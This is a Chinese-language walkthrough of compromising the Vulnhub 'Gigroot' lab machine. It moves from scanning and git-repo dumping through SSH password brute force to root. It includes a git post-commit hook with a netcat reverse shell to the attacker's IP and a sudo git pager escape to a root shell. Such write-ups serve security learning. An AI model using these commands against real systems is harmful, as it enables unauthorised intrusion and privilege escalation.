Vulnhub之Gigroot靶机详细测试过程

Gigroot

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:ab:4c:5b      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.103  08:00:27:44:c8:1b      1      60  PCS Systemtechnik GmbH 

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 22:08 EDT
Nmap scan report for localhost (192.168.56.103)
Host is up (0.000075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 bf45f6b3e3ce0c69185a5b27e5d39c86 (RSA)
|   256 b5d7455006c4e23c2852b806261fdeb0 (ECDSA)
|_  256 27f0d02113309c5ef070a1d85ca78f75 (ED25519)
80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
|_http-title: Hey Jen
|_http-server-header: Apache/2.4.38 (Debian)
11211/tcp open  memcache?
| fingerprint-strings: 
|   RPCCheck: 
|_    Unknown command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port11211-TCP:V=7.93%I=7%D=4/29%Time=644DCDBD%P=x86_64-pc-linux-gnu%r(R
SF:PCCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unk
SF:nown\x20command");
MAC Address: 08:00:27:44:C8:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.92 seconds

NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://192.168.56.103/                                                                      
<!doctype html>
<html>
        <head>
                <title>Hey Jen</title>
                </head>


        <body>
                <p> Hey Jen, just installed wordpress over at wp.gitroot.vuln <br> please go check it out! <p>
        </body>
</html>

将wp.gitroot.vuln加入/etc/hosts文件中:

┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo vim /etc/hosts                                        

┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts             
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.103  wp.gitroot.vuln

此时访问url,从返回页面可知目标为Wordpress站点:

http://wp.gitroot.vuln/
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://wp.gitroot.vuln/ 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    wp.gitroot.vuln
+ Target Port:        80
+ Start Time:         2023-04-29 22:24:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://wp.gitroot.vuln/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7863 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-04-29 22:25:11 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 
──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://wp.gitroot.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh,.bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://wp.gitroot.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,bak,php,js
[+] Timeout:                 10s
===============================================================
2023/04/29 22:25:59 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.php            (Status: 301) [Size: 1] [--> http://wp.gitroot.vuln/]
/wp-content           (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/wp-content/]
/wp-login.php         (Status: 200) [Size: 3195]
/manual               (Status: 301) [Size: 319] [--> http://wp.gitroot.vuln/manual/]
/wp-includes          (Status: 301) [Size: 324] [--> http://wp.gitroot.vuln/wp-includes/]
/wp                   (Status: 403) [Size: 280]
/javascript           (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/javascript/]
/readme.html          (Status: 200) [Size: 7440]
/wp-trackback.php     (Status: 200) [Size: 136]
/wp-admin             (Status: 301) [Size: 321] [--> http://wp.gitroot.vuln/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 43]
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/wp-signup.php        (Status: 302) [Size: 1] [--> http://wp.gitroot.vuln/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 280]
Progress: 1540385 / 1543927 (99.77%)===============================================================
2023/04/29 22:29:10 Finished
============================================================

因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运行结果中没有看到除了wordpress相关的目录文件之外的信息。接下来看是否可以用wpscan工具扫描出用户名或者可利用的插件。

─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -e u,p
[+] beth
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

wpscan工具扫描出用户名beth,看能否破解其密码。

(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -U beth -P /usr/share/wordlists/rockyou.txt

没有破解出用户beth的密码,那看下可否扫描出插件。

─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ --plugins-detection mixed

虽然扫描出插件akismet,但是该插件没有漏洞可利用。

会不会存在其他子域名?

将gitroot.vuln加入到/etc/hosts文件后,用wfuzz工具爆破子域名

┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wfuzz -c -u http://gitroot.vuln -H "Host:FUZZ.gitroot.vuln" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 26
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://gitroot.vuln/
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000000001:   400        12 L     53 W       422 Ch      "# directory-list-2.3-medium.txt"                            
000000003:   400        12 L     53 W       422 Ch      "# Copyright 2007 James Fisher"                              
000000007:   400        12 L     53 W       422 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3
                                                        .0/"                                                         
000000012:   400        12 L     53 W       422 Ch      "# on at least 2 different hosts"                            
000000013:   400        12 L     53 W       422 Ch      "#"                                                          
000000011:   400        12 L     53 W       422 Ch      "# Priority ordered case-sensitive list, where entries were f
                                                        ound"                                                        
000000010:   400        12 L     53 W       422 Ch      "#"                                                          
000000009:   400        12 L     53 W       422 Ch      "# Suite 300, San Francisco, California, 94105, USA."        
000000002:   400        12 L     53 W       422 Ch      "#"                                                          
000000008:   400        12 L     53 W       422 Ch      "# or send a letter to Creative Commons, 171 Second Street," 
000000005:   400        12 L     53 W       422 Ch      "# This work is licensed under the Creative Commons"         
000000006:   400        12 L     53 W       422 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of thi
                                                        s"                                                           
000000004:   400        12 L     53 W       422 Ch      "#"                                                          
000000793:   200        131 L    578 W      10697 Ch    "wp"                                                         
000002024:   400        12 L     53 W       422 Ch      "'"                                                          
000003790:   400        12 L     53 W       422 Ch      "%20"                                                        
000005302:   400        12 L     53 W       422 Ch      "$FILE"                                                      
000005954:   400        12 L     53 W       422 Ch      "$file"                                                      
000007004:   400        12 L     53 W       422 Ch      "*checkout*"                                                 
000012898:   200        21 L     51 W       438 Ch      "repo" 

发现出repo子域名,将其加入到/etc/hosts文件中去:

┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.103  wp.gitroot.vuln
192.168.56.103  gitroot.vuln
192.168.56.103  repo.gitroot.vuln

利用浏览器访问子域名repo,此次返回内容为:

┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://repo.gitroot.vuln/
<!doctype html

<html>
<head>

    <title>Code storage</title>
</head>
 <style>

body {
  background-image: url('http://repo.gitroot.vuln/codeBackground.jpg');
  background-repeat: no-repeat;
}
</style> 
<body>

        <h1 style="color:white;">Welcome to our code storage area, we are currently storing a bunch of code here</h1>
        <p style="color:white;">Feel free to search our code base at get.php or set code in set.php </p>
</body>

</html>
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://repo.gitroot.vuln -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.txt,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://repo.gitroot.vuln
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,bak,txt,js
[+] Timeout:                 10s
===============================================================
2023/04/30 06:07:55 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 282]
/index.php            (Status: 200) [Size: 438]
/.php                 (Status: 403) [Size: 282]
/stats.php            (Status: 200) [Size: 2911]
/manual               (Status: 301) [Size: 323] [--> http://repo.gitroot.vuln/manual/]
/get.php              (Status: 200) [Size: 144]
/javascript           (Status: 301) [Size: 327] [--> http://repo.gitroot.vuln/javascript/]
/set.php              (Status: 200) [Size: 151]
/.php                 (Status: 403) [Size: 282]
/.html                (Status: 403) [Size: 282]
/server-status        (Status: 403) [Size: 282]
Progress: 1542281 / 1543927 (99.89%)===============================================================
2023/04/30 06:11:15 Finished
===============================================================

用gobuster工具没有扫描出上述子域名下更有价值的文件或者目录

──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://repo.gitroot.vuln
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    repo.gitroot.vuln
+ Target Port:        80
+ Start Time:         2023-04-30 06:11:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7863 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-04-30 06:12:20 (GMT-4) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

nikto工具结果表明该子域名存在/.git目录,用githack工具将repo的文件clone到Kali Linux本地

┌──(kali㉿kali)-[~/Toolsets/GitHack]
└─$ python GitHack.py http://repo.gitroot.vuln/.git/
[+] Download and parse index file ...
[+] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
[+] get.php
[+] index.php
[+] pablo_HELP.txt
[+] set.php
[+] stats.php
[OK] get.php
[OK] index.php
[OK] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
[OK] pablo_HELP.txt
[OK] set.php
[OK] stats.php
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ cat pablo_HELP.txt 
I need help, something is wrong with this git repo

┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ cat 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt 
pablo_S3cret_P@ss
beth_S3cret_P@ss
jen_S3cret_P@ss

先看能否破解pablo的密码

─(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ hydra -l pablo -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.103     

密码为mastergitar

┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ ssh [email protected]                                        
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ED25519 key fingerprint is SHA256:60rNw8fczihsSqs64B1Lf2E1VkCGOsuq8BTev2ELwLw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux GitRoot 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 26 01:30:55 2020 from 192.168.56.1
pablo@GitRoot:~$ id
uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)
pablo@GitRoot:~$ ls -alh
total 32K
drwxr-xr-x 4 pablo pablo 4.0K May 26  2020 .
drwxr-xr-x 5 root  root  4.0K May 26  2020 ..
lrwxrwxrwx 1 pablo pablo    9 May 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 pablo pablo  220 May 25  2020 .bash_logout
-rw-r--r-- 1 pablo pablo 3.5K May 25  2020 .bashrc
drwx------ 3 pablo pablo 4.0K May 25  2020 .gnupg
-rw-r--r-- 1 pablo pablo  807 May 25  2020 .profile
drwx-wx-wx 2 pablo pablo 4.0K May 25  2020 public
-rw-r--r-- 1 root  root   871 May 26  2020 user.txt
pablo@GitRoot:~$ cat user.txt 

  _______ _                 _                          _____      _     _       
 |__   __| |               | |                        |  __ \    | |   | |     
    | |  | |__   __ _ _ __ | | __  _   _  ___  _   _  | |__) |_ _| |__ | | ___  
    | |  | '_ \ / _` | '_ \| |/ / | | | |/ _ \| | | | |  ___/ _` | '_ \| |/ _ \ 
    | |  | | | | (_| | | | |   <  | |_| | (_) | |_| | | |  | (_| | |_) | | (_) 
    |_|  |_| |_|\__,_|_| |_|_|\_\  \__, |\___/ \__,_| |_|   \__,_|_.__/|_|\___/ 
                                    __/ |                                       
                                   |___/                                        



Great job! Do not falter, there is more to do. You made it this far, finish the race!

"It's not that I'm so smart. Its just that I stay with problems longer." - Albert Einstein 

8a81007ea736a2b8a72a624672c375f9ac707b5e
pablo@GitRoot:~$ 
pablo@GitRoot:~/public$ ls -alh
total 12K
drwx-wx-wx 2 pablo pablo 4.0K May 25  2020 .
drwxr-xr-x 4 pablo pablo 4.0K May 26  2020 ..
-rw-r--r-- 1 beth  beth    58 May 25  2020 message.txt
pablo@GitRoot:~/public$ cat message.txt 
Hey pablo

Make sure to check-out our brand new git repo!

需要找出另外一个git仓库

将linpeas.sh脚本上传至目标主机站点:

══════════╣ Analyzing Github Files (limit 70)

-rw-r--r-- 1 jen jen 50 May 26  2020 /home/jen/.gitconfig


drwxr-xr-x 8 beth beth 4096 May 26  2020 /opt/auth/.git
drwxr-xr-x 8 root root 4096 May 25  2020 /var/www/repo/.git

发现了一个新的git仓库:drwxr-xr-x 8 beth beth 4096 May 26 2020 /opt/auth/.git

进入该目录查看

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ ls -alh | sort -n -r
total 804K
-rw-r--r-- 1 beth beth  595 May 26  2020 dev-43
-rw-r--r-- 1 beth beth  445 May 26  2020 dev-199
-rw-r--r-- 1 beth beth  443 May 26  2020 dev-99
-rw-r--r-- 1 beth beth  443 May 26  2020 dev-98

该目录下有很多文件,但是用sort命令查看,其中文件dev-43的大小不一样。

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat dev-43 
0000000000000000000000000000000000000000 fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name <[email protected]> 1590499965 -0400branch: Created from HEAD
fc9901f3b6b303d6ad40cdb71689f1646904f7b3 b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name <[email protected]> 1590500014 -0400commit: init repo
b2ab5f540baab4c299306e16f077d7a6f6556ca3 06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name <[email protected]> 1590500148 -0400commit: added some stuff
06fbefc1da56b8d552cfa299924097ba1213dd93 aaa283c708d79c692797339434664f4ba7accb25 Your Name <[email protected]> 1590500197 -0400commit: init repo
pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93
commit 06fbefc1da56b8d552cfa299924097ba1213dd93
Author: Your Name <[email protected]>
Date:   Tue May 26 09:35:48 2020 -0400

    added some stuff

diff --git a/main.c b/main.c
index 70e6397..8af9b9c 100644
--- a/main.c
+++ b/main.c
@@ -4,6 +4,15 @@
 int main(){

         char pass[20];
-       return 0;
+        scanf("%20s", pass);
+        printf("You put %s\n", pass);
+        if (strcmp(pass, "r3vpdmspqdb") == 0 ){
+                char *cmd[] = { "bash", (char *)0 };
+                execve("/bin/bash", cmd, (char *) 0);
+        }
+        else{
+                puts("BAD PASSWORD");
+        }
+        return 0;
 }
-//43
+
(END)

发现了一个密码:r3vpdmspqdb, 很显然,因为新的.git目录属主是beth,因此该密码应该也是属于beth

切换到用户beth

pablo@GitRoot:~$ su - beth
Password: 
beth@GitRoot:~$ 
beth@GitRoot:~$ ls -alh
total 28K
drwxr-xr-x 5 beth beth 4.0K May 26  2020 .
drwxr-xr-x 5 root root 4.0K May 26  2020 ..
lrwxrwxrwx 1 beth beth    9 May 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 beth beth    0 May 25  2020 .bash_logout
-rw-r--r-- 1 beth beth 3.5K May 26  2020 .bashrc
drwx------ 3 beth beth 4.0K May 26  2020 .gnupg
drwxr-xr-x 3 beth beth 4.0K May 25  2020 .local
-rw-r--r-- 1 beth beth  807 May 26  2020 .profile
drwx-wx-wx 2 beth beth 4.0K May 26  2020 public

在beth目录下,新建.git/hooks文件夹,建一个post-commit文件,里面写入使用nc反弹shell的一句话,文件给777权限,再将.git文件夹压缩成zip格式,再给777权限

beth@GitRoot:~$ mkdir -p .git/hooks
beth@GitRoot:~$ cd .git/hooks/
beth@GitRoot:~/.git/hooks$ vim post-commit
beth@GitRoot:~/.git/hooks$ cat post-commit 
#!/bin/bash
nc -e /bin/bash 192.168.56.206 6666
beth@GitRoot:~/.git/hooks$ chmod 777 post-commit 
beth@GitRoot:~/.git/hooks$ cd ~
beth@GitRoot:~$ 7z a xshell.zip  .git/

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (906ED),ASM,AES-NI)

Scanning the drive:
2 folders, 1 file, 48 bytes (1 KiB)

Creating archive: xshell.zip

Items to compress: 3


Files read from disk: 1
Archive size: 482 bytes (1 KiB)
Everything is Ok
beth@GitRoot:~$ chmod 777 xshell.zip 
beth@GitRoot:~$ 

复制压缩包到/home/jen/public/repos目录下

beth@GitRoot:~$ chmod 777 xshell.zip 
beth@GitRoot:~$ cp xshell.zip /home/jen/public/repos
jen@GitRoot:~$ cat .viminfo
cat .viminfo
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:wq
|2,0,1590471909,,"wq"
:q!
|2,0,1590471893,,"q!"
:Q!
|2,0,1590471892,,"Q!"

# Search String History (newest to oldest):
?/binzpbeocnexoe
|2,1,1590471908,47,"binzpbeocnexoe"

jen的密码是binzpbeocnexoe

提权

jen@GitRoot:~$ sudo -l
sudo -l
[sudo] password for jen: binzpbeocnexoe

Matching Defaults entries for jen on GitRoot:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jen may run the following commands on GitRoot:
    (ALL) /usr/bin/git
jen@GitRoot:~$ sudo /usr/bin/git -p help config        
sudo /usr/bin/git -p help config
WARNING: terminal is not fully functional
-  (press RETURN)!/bin/sh
!//bbiinn//sshh!/bin/sh
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------  5 root root 4.0K May 26  2020 .
drwxr-xr-x 18 root root 4.0K May 25  2020 ..
lrwxrwxrwx  1 root root    9 May 26  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K May 25  2020 .gnupg
drwxr-xr-x  3 root root 4.0K May 25  2020 .local
-rw-r--r--  1 root root   56 May 25  2020 passwords
drwxr-xr-x  2 root root 4.0K May 26  2020 POC
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 5.9K May 26  2020 root.txt
-rw-r--r--  1 root root  569 May 25  2020 setpasswords.php
# cat root.txt
cat root.txt
                                                         /////                                                         
                                                      ////////////.                                                     
                                                   */////////////////                                                   
                                                 //////////////////////.                                                
                                              *///////////////////////////                                              
                                            ////////////////////////////////.                                           
                                             */////////////////////////////////                                         
                                                /////////////////////////////////.                                      
                                    *///.         */////////////////////////////////                                    
                                  /////////          /////////////////////////////////.                                 
                               */////////////.         */////////////////////////////////                               
                             ///////////////////                .//////////////////////////,                            
                          *///////////////////////.                .//////////////////////////                          
                        ////////////////////////////                 ///////////////////////////,                       
                     *//////////////////////////////                  /////////////////////////////                     
                   /////////////////////////////////                 ////////////////////////////////,                  
                *////////////////////////////////////                 ,/////////////////////////////////                
              /////////////////////////////////////////                  /////////////////////////////////,             
           ,/////////////////////////////////////////////       ..         ,/////////////////////////////////           
         ////////////////////////////////////////////////       .///          /////////////////////////////////.        
      ,//////////////////////////////////////////////////       ./////.         */////////////////////////////////      
    /////////////////////////////////////////////////////       .////////                ,//////////////////////////.   
  ///////////////////////////////////////////////////////       .//////////.                .////////////////////////// 
,////////////////////////////////////////////////////////       .////////////                 //////////////////////////
/////////////////////////////////////////////////////////       .///////////,                  /////////////////////////
 ////////////////////////////////////////////////////////       .////////////                 //////////////////////////
  ///////////////////////////////////////////////////////       ./////////////               /////////////////////////* 
    ,////////////////////////////////////////////////////       .///////////////           /////////////////////////    
       //////////////////////////////////////////////////       .////////////////////////////////////////////////*      
         ,///////////////////////////////////////////////       .//////////////////////////////////////////////         
            /////////////////////////////////////////////       .///////////////////////////////////////////*           
              ,/////////////////////////////////////////         /////////////////////////////////////////              
                 ////////////////////////////////////*              ///////////////////////////////////*                
                   ,////////////////////////////////                 ////////////////////////////////                   
                      //////////////////////////////                  /////////////////////////////                     
                        ,///////////////////////////                 ///////////////////////////                        
                           //////////////////////////               //////////////////////////                          
                             ,/////////////////////////           /////////////////////////                             
                                /////////////////////////////////////////////////////////                               
                                  ,///////////////////////////////////////////////////                                  
                                     ///////////////////////////////////////////////                                    
                                       ,/////////////////////////////////////////                                       
                                          /////////////////////////////////////                                         
                                            .///////////////////////////////                                            
                                               ///////////////////////////                                              
                                                 ./////////////////////                                                 
                                                    /////////////////                                                   
                                                      .///////////                 




Thank you for completing my box! Please let my know what you liked and what you didn't like at my twitter @Recursive_NULL



734ae32be131cd0681f86c03858f4f587a3c69ce
# 

热门相关:斗神战帝   横行霸道   最强装逼打脸系统   最强装逼打脸系统   最强装逼打脸系统